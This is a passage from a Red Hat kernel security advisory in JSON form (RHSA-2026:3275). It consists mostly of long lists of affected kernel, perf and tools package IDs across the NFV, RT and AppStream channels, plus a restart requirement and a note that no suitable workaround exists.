"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
],
"restart_required": {
"category": "machine"
},
"url": "https://access.redhat.com/errata/RHSA-2026:3275"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
